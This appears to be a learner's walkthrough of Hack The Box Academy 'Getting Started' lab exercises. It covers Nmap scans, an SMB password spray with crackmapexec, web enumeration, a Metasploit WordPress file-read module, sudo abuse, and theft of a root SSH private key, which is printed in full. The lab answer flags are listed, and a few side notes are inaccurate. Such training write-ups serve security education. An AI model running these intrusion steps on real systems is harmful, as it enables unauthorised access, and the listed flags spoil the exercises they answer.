GETTING STARTED

BASIC TOOLS

Apply what you learned in this section to grab the banner of the above server and submit it as the answer.

root@htb:~$ nc 94.237.121.100 42763
 SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1

SERVICE SCANNING

Perform an Nmap scan of the target. What does Nmap display as the version of the service running on port 8080?

root@htb:~$ sudo nmap -sV -sC 10.129.150.121 -p-
 PORT     STATE SERVICE     VERSION
 21/tcp   open  ftp         vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_drwxr-xr-x    2 ftp      ftp          4096 Feb 25  2021 pub
 | ftp-syst: 
 |   STAT: 
 | FTP server status:
 |      Connected to ::ffff:10.10.15.201
 |      Logged in as ftp
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 3
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   3072 a0:01:d7:79:e9:d2:09:2a:b8:d9:b4:9a:6c:00:0c:1c (RSA)
 |   256 2b:99:b2:1f:ec:1a:5a:c6:b7:be:b5:50:d1:0e:a9:df (ECDSA)
 |_  256 e4:f8:17:8d:d4:71:d1:4e:d4:0e:bd:f0:29:4f:6d:14 (ED25519)
 80/tcp   open  http        Apache httpd 2.4.41 ((Ubuntu))
 |_http-title: PHP 7.4.3 - phpinfo()
 |_http-server-header: Apache/2.4.41 (Ubuntu)
 139/tcp  open  netbios-ssn Samba smbd 4.6.2
 445/tcp  open  netbios-ssn Samba smbd 4.6.2
 2323/tcp open  telnet      Linux telnetd
 8080/tcp open  http        Apache Tomcat
 |_http-title: Apache Tomcat
 |_http-open-proxy: Proxy might be redirecting requests
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
 
 Host script results:
 | smb2-time: 
 |   date: 2025-06-03T22:29:42
 |_  start_date: N/A
 |_clock-skew: -1s
 |_nbstat: NetBIOS name: GS-SVCSCAN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb2-security-mode: 
 |   3:1:1: 
 |_    Message signing enabled but not required

Perform an Nmap scan of the target and identify the non-default port that the telnet service is running on.

root@htb:~$ sudo nmap -sV -sC 10.129.150.121 -p-
 PORT     STATE SERVICE     VERSION
 21/tcp   open  ftp         vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_drwxr-xr-x    2 ftp      ftp          4096 Feb 25  2021 pub
 | ftp-syst: 
 |   STAT: 
 | FTP server status:
 |      Connected to ::ffff:10.10.15.201
 |      Logged in as ftp
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 3
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   3072 a0:01:d7:79:e9:d2:09:2a:b8:d9:b4:9a:6c:00:0c:1c (RSA)
 |   256 2b:99:b2:1f:ec:1a:5a:c6:b7:be:b5:50:d1:0e:a9:df (ECDSA)
 |_  256 e4:f8:17:8d:d4:71:d1:4e:d4:0e:bd:f0:29:4f:6d:14 (ED25519)
 80/tcp   open  http        Apache httpd 2.4.41 ((Ubuntu))
 |_http-title: PHP 7.4.3 - phpinfo()
 |_http-server-header: Apache/2.4.41 (Ubuntu)
 139/tcp  open  netbios-ssn Samba smbd 4.6.2
 445/tcp  open  netbios-ssn Samba smbd 4.6.2
 2323/tcp open  telnet      Linux telnetd
 8080/tcp open  http        Apache Tomcat
 |_http-title: Apache Tomcat
 |_http-open-proxy: Proxy might be redirecting requests
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
 
 Host script results:
 | smb2-time: 
 |   date: 2025-06-03T22:29:42
 |_  start_date: N/A
 |_clock-skew: -1s
 |_nbstat: NetBIOS name: GS-SVCSCAN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb2-security-mode: 
 |   3:1:1: 
 |_    Message signing enabled but not required

List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.

root@htb:~$ sudo nmap -sV -sC 10.129.150.121 -p-
 PORT     STATE SERVICE     VERSION
 21/tcp   open  ftp         vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_drwxr-xr-x    2 ftp      ftp          4096 Feb 25  2021 pub
 | ftp-syst: 
 |   STAT: 
 | FTP server status:
 |      Connected to ::ffff:10.10.15.201
 |      Logged in as ftp
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 3
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   3072 a0:01:d7:79:e9:d2:09:2a:b8:d9:b4:9a:6c:00:0c:1c (RSA)
 |   256 2b:99:b2:1f:ec:1a:5a:c6:b7:be:b5:50:d1:0e:a9:df (ECDSA)
 |_  256 e4:f8:17:8d:d4:71:d1:4e:d4:0e:bd:f0:29:4f:6d:14 (ED25519)
 80/tcp   open  http        Apache httpd 2.4.41 ((Ubuntu))
 |_http-title: PHP 7.4.3 - phpinfo()
 |_http-server-header: Apache/2.4.41 (Ubuntu)
 139/tcp  open  netbios-ssn Samba smbd 4.6.2
 445/tcp  open  netbios-ssn Samba smbd 4.6.2
 2323/tcp open  telnet      Linux telnetd
 8080/tcp open  http        Apache Tomcat
 |_http-title: Apache Tomcat
 |_http-open-proxy: Proxy might be redirecting requests
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
 
 Host script results:
 | smb2-time: 
 |   date: 2025-06-03T22:29:42
 |_  start_date: N/A
 |_clock-skew: -1s
 |_nbstat: NetBIOS name: GS-SVCSCAN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb2-security-mode: 
 |   3:1:1: 
 |_    Message signing enabled but not required

root@htb:~$ find / -iname *username* 2>/dev/null
 /usr/share/seclists/Usernames/top-usernames-shortlist.txt
 
root@htb:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .

#this will test whether shares can be listed w/o passwords
root@htb:~$ smbclient -N -L \\\\10.129.150.121

 Sharename       Type      Comment
 ---------       ----      -------
 print$          Disk      Printer Drivers
 users           Disk      
 IPC$            IPC       IPC Service (gs-svcscan server (Samba, Ubuntu))
 
 Reconnecting with SMB1 for workgroup listing.
 smbXcli_negprot_smb1_done: No compatible protocol selected by server.
 protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
 Unable to connect with SMB1 -- no workgroup available

 * the -N must be specified BEFORE the -L
 
root@htb:~$ smbclient -N \\\\10.129.150.121\\users
 Try "help" to get a list of possible commands.
smb: \> ls
 NT_STATUS_ACCESS_DENIED listing \*
smb: \> 

root@htb:~$ find / -iname *worst* 2>/dev/null
 /usr/share/seclists/Passwords/500-worst-passwords.txt

root@htb:~$ cp /usr/share/seclists/Passwords/500-worst-passwords.txt .

root@htb:~$ which crackmapexec
 /usr/bin/crackmapexec
root@htb:~$ crackmapexec smb 10.129.150.91 -u bob -p 500-worst-passwords.txt
 SMB         10.129.150.91   445    GS-SVCSCAN       [*] Windows 6.1 Build 0 (name:GS-SVCSCAN) (domain:) (signing:False) (SMBv1:False)
 SMB         10.129.150.91   445    GS-SVCSCAN       [-] \bob:123456 STATUS_LOGON_FAILURE 
 ...
 
 * nothing found
 
root@htb:~$ cp /usr/share/seclists/Passwords/2020-200_most_used_passwords.txt .
root@htb:~$ crackmapexec smb 10.129.150.91 -u bob -p 2020-200_most_used_passwords.txt
 SMB         10.129.150.91   445    GS-SVCSCAN       [*] Windows 6.1 Build 0 (name:GS-SVCSCAN) (domain:) (signing:False) (SMBv1:False)
 SMB         10.129.150.91   445    GS-SVCSCAN       [-] \bob:123456 STATUS_LOGON_FAILURE 
 ...
 
 * nothing found
 
root@htb:~$ cp /usr/share/seclists/Passwords/xato-net-10-million-passwords-10000.txt .
 
root@htb:~$ crackmapexec smb 10.129.150.91 -u bob -p xato-net-10-million-passwords-10000.txt -t 1024

 * default threads is 256
    - crackmapexec smb -h
    
root@htb:~$ crackmapexec smb 10.129.150.91 -u bob -p test.txt -d .
 SMB         10.129.150.91   445    GS-SVCSCAN       [*] Windows 6.1 Build 0 (name:GS-SVCSCAN) (domain:) (signing:False) (SMBv1:False)
 SMB         10.129.150.91   445    GS-SVCSCAN       [+] .\bob:Welcome1 
 
 * -d specifies the domain name to use during authentication
    - the -d MUST be specified else CME will to guess the domain or uses the username as-is and the correct password won't be found

root@htb:~$ smbclient \\\\10.129.150.91\\users -U bob%Welcome1
 Try "help" to get a list of possible commands.
smb: \> ls
 .                                   D        0  Thu Feb 25 17:06:52 2021
 ..                                  D        0  Thu Feb 25 14:05:31 2021
 flag                                D        0  Thu Feb 25 17:09:26 2021
 bob                                 D        0  Thu Feb 25 15:42:23 2021

	4062912 blocks of size 1024. 1277784 blocks available
smb: \> cd flag
smb: \flag\> ls
 .                                   D        0  Thu Feb 25 17:09:26 2021
 ..                                  D        0  Thu Feb 25 17:06:52 2021
 flag.txt                            N       33  Thu Feb 25 17:09:26 2021

		4062912 blocks of size 1024. 1277780 blocks available

smb: \flag\> get flag.txt 
 getting file \flag\flag.txt of size 33 as flag.txt (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \flag\> exit
root@htb:~$ cat flag.txt
 dceece590f3284c3866305eb2473d099

WEB ENUMERATION

Try running some of the web enumeration techniques you learned in this section on the server above, and use the info you get to get the flag.

#conduct source code review
root@htb:~$ BROWSER > http://94.237.56.113:41345/

 * nothing significant found

#conduct directory/file enumeration
root@htb:~$  find / -iname common.txt 2>/dev/null
 /usr/share/dirb/wordlists/common.txt
 
root@htb:~$ cp /usr/share/dirb/wordlists/common.txt .

root@htb:~$ gobuster dir -u http://94.237.56.113:41345 -w common.txt
 ===============================================================
 Starting gobuster in directory enumeration mode
 ===============================================================
 /.htpasswd            (Status: 403) [Size: 281]
 /.htaccess            (Status: 403) [Size: 281]
 /.hta                 (Status: 403) [Size: 281]
 /index.php            (Status: 200) [Size: 990]
 /robots.txt           (Status: 200) [Size: 45]
 /server-status        (Status: 403) [Size: 281]
 /wordpress            (Status: 301) [Size: 327] [--> http://94.237.56.113:41345/wordpress/]
 Progress: 4614 / 4615 (99.98%)
 ===============================================================
 Finished
 ===============================================================
 
#identify entry point
root@htb:~$ curl http://94.237.56.113:41345/robots.txt
 User-agent: *
 Disallow: /admin-login-page.php

# conduct source code review of newly identified site
root@htb:~$ BROWSER > http://94.237.56.113:41345/admin-login-page.php
 ...
 <body>
   <form name='login' autocomplete='off' class='form' action='' method='post'>
     <div class='control'>
       <h1>
         Admin Panel
       </h1>
     </div>
     <div class="container">
       <label for="username"><b>Username</b></label>
         <input name='username' placeholder='Username' type='text'>

       <label for="password"><b>Password</b></label>
         <input name='password' placeholder='Password' type='password'>

       <!-- TODO: remove test credentials admin:password123 -->

         <button type="submit" formmethod='post'>Login</button>
     </div>
     </form>
  </body>

root@htb:~$ BROWSER > http://94.237.56.113:41345/admin-login-page.php
 username: admin
 password: password123
 
 * HTB{w3b_3num3r4710n_r3v34l5_53cr375}

PUBLIC EXPLOITS

Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sV -sC -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 22/tcp    open  ssh         OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
 | ssh-hostkey: 
 |   256 52:5d:e8:2b:7a:97:86:1f:3d:f9:a7:40:e4:fd:d1:49 (ECDSA)
 |_  256 d7:fe:55:ac:c5:ef:30:aa:12:2c:fd:30:bf:a0:d2:08 (ED25519)
 111/tcp   open  rpcbind     2-4 (RPC #100000)
 | rpcinfo: 
 |   program version    port/proto  service
 |   100000  2,3,4        111/tcp   rpcbind
 |   100000  2,3,4        111/udp   rpcbind
 |   100000  3,4          111/tcp6  rpcbind
 |_  100000  3,4          111/udp6  rpcbind
 ...

 39038/tcp open  http        Apache httpd 2.4.41 ((Ubuntu))
 |_http-server-header: Apache/2.4.41 (Ubuntu)
 |_http-title: Getting Started &#8211; Just another WordPress site
 |_http-generator: WordPress 5.6.1
 39309/tcp open  http        Apache httpd 2.4.41 ((Ubuntu))
 |_http-server-header: Apache/2.4.41 (Ubuntu)
 |_http-title: Employee File Manager
 ...

Service Info: Host: ng-1652118-hwtheneedle-3tow2-7dc7c4b74d-7d9p6; OS: Linux; CPE: cpe:/o:linux:linux_kernel

 * Typically '-sV' is used with Nmap to determine versions, but that's not always enough. 
    - adding the -sC is another good way to determine service versions
       - the -sC option will run safe scripts which are designed to provide useful 
         information without being too intrusive or causing harm to the target systems.
 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
         
 * use the -Pn option of Nmap when ICMP packets are blocked by the Windows firewall
    - the -PN option treats all hosts as online and will skip host discovery

VULNERABILITY SCANNING

root@htb:~$ sudo nmap --script=vuln {targetIP} -p 22,111,39038
 PORT   STATE SERVICE
 22/tcp    open  ssh
 111/tcp   open  rpcbind
 39038/tcp open  unknown

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

root@htb:~$ BROWSER > http://83.136.253.217:39038
 Getting Started
 Just another WordPress site
 Simple Backup Plugin 2.7.10 for WordPress

root@htb:~$ msfconsole
msf6> search wordpress 2.7.10
 Matching Modules
 ================

   #  Name                                               Disclosure Date  Rank    Check  Description
   -  ----                                               ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/wp_simple_backup_file_read  .                normal  No     WordPress Simple Backup File Read Vulnerability

msf6> use 0
msf6> show options
 Name       Current Setting  Required  Description
 ----       ---------------  --------  -----------
 DEPTH      6                yes       Traversal Depth (to reach the root folder)
 FILEPATH   /etc/passwd      yes       The path to the file to read
 Proxies                     no        A proxy chain of format type:host:port[,type:host:port]
                                         [...]
 RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/doc
                                         s/using-metasploit/basics/using-metasploit.html
 RPORT      80               yes       The target port (TCP)
 SSL        false            no        Negotiate SSL/TLS for outgoing connections
 TARGETURI  /                yes       The base path to the wordpress application
 THREADS    1                yes       The number of concurrent threads (max one per host)
 VHOST                       no        HTTP server virtual host

msf6> set RHOSTS 83.136.253.217
msf6> set RPORT 39038
msf6> set FILEPATH /flag.txt
msf6> exploit
 [+] File saved in: /home/htb-ac-53539/.msf4/loot/20250601224650_default_83.136.253.217_simplebackup.tra_336833.txt
 
msf6> exit
root@oco:~$ cp /home/htb-ac-53539/.msf4/loot/20250601224650_default_83.136.253.217_simplebackup.tra_336833.txt .
root@oco:~$ cat 20250601224650_default_83.136.253.217_simplebackup.tra_336833.txt 
 HTB{my_f1r57_h4ck}

PRIVILEGE ESCALATION

SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'.

root@htb:~$ ssh [email protected] -p 56765
 password1

 * the -p is used if the remote ssh server is using a non-standard port
 
user1@target:~$ cat /etc/passwd | grep -i "/bin/bash"
 root:x:0:0:root:/root:/bin/bash
 user1:x:1000:1000::/home/user1:/bin/bash
 user2:x:1001:1001::/home/user2:/bin/bash
 
user1@target:~$ sudo -l
Matching Defaults entries for user1 on ng-53539-gettingstartedprivesc-djiwb-55d7d8f7b-x8thd:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user1 may run the following commands on ng-53539-gettingstartedprivesc-djiwb-55d7d8f7b-x8thd:
    (user2 : user2) NOPASSWD: /bin/bash
    
 * The NOPASSWD entry shows that the /bin/bash command can be executed without
   a password

user1@target:~$ sudo -u user2 /bin/bash
user2target:~$ cat /home/user2/flag.txt 
 HTB{l473r4l_m0v3m3n7_70_4n07h3r_u53r}

Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.

root@htb:~$ ssh [email protected] -p 56765
 password1

 * the -p is used if the remote ssh server is using a non-standard port
 
user1@target:~$ cat /etc/passwd | grep -i "/bin/bash"
 root:x:0:0:root:/root:/bin/bash
 user1:x:1000:1000::/home/user1:/bin/bash
 user2:x:1001:1001::/home/user2:/bin/bash
 
user1@target:~$ sudo -l
 Matching Defaults entries for user1 on ng-53539-gettingstartedprivesc-djiwb-55d7d8f7b-x8thd:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

 User user1 may run the following commands on ng-53539-gettingstartedprivesc-djiwb-55d7d8f7b-x8thd:
    (user2 : user2) NOPASSWD: /bin/bash
    
 * The NOPASSWD entry shows that the /bin/bash command can be executed without
   a password

user1@target:~$ sudo -u user2 /bin/bash

#enumerate
user2@target:~$ ls -la ~/.ssh; ls -la /root/.ssh
 ls: cannot access '/home/user2/.ssh': No such file or directory
 total 20
 drwxr-x--- 1 root user2 4096 Feb 12  2021 .
 drwxr-x--- 1 root user2 4096 Feb 12  2021 ..
 -rw------- 1 root root   571 Feb 12  2021 authorized_keys
 -rw-r--r-- 1 root root  2602 Feb 12  2021 id_rsa
 -rw-r--r-- 1 root root   571 Feb 12  2021 id_rsa.pub

#
user2@target:~$ cat /root/.ssh/id_rsa
 -----BEGIN OPENSSH PRIVATE KEY-----
 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
 -----END OPENSSH PRIVATE KEY-----

#
root@oco:~$ nano target-94.237.48.12-id_rsa
 -----BEGIN OPENSSH PRIVATE KEY-----
 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
 -----END OPENSSH PRIVATE KEY-----
 
 * paste copied key value

root@htb:~$ chmod 600 target-94.237.48.12-id_rsa

 * changing the file permission to restrictive is required; else
   the ssh server would prevent them from working

root@htb:~$ ssh -i target-94.237.48.12-id_rsa [email protected] -p 45074
 Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 6.1.0-10-amd64 x86_64)

  * Documentation:  https://help.ubuntu.com
  * Management:     https://landscape.canonical.com
  * Support:        https://ubuntu.com/advantage


 This system has been minimized by removing packages and content that are
 not required on a system that users do not log into.
 
 To restore this content, you can run the 'unminimize' command.

 The programs included with the Ubuntu system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
 applicable law.

root@target:~$ ls /root/
 flag.txt
root@target:~$ cat /root/flag.txt 
 HTB{pr1v1l363_35c4l4710n_2_r007}

NIBBLES - ENUMERATION

Run an nmap script scan on the target. What is the Apache version running on the server? (answer format: X.X.XX)

root@htb:~$ sudo nmap -sV -sC -T4 10.129.200.170 -p-
  PORT     STATE SERVICE       VERSION
  22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey: 
  |   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
  |   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
  |_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
  80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
  |_http-title: Site doesn't have a title (text/html).
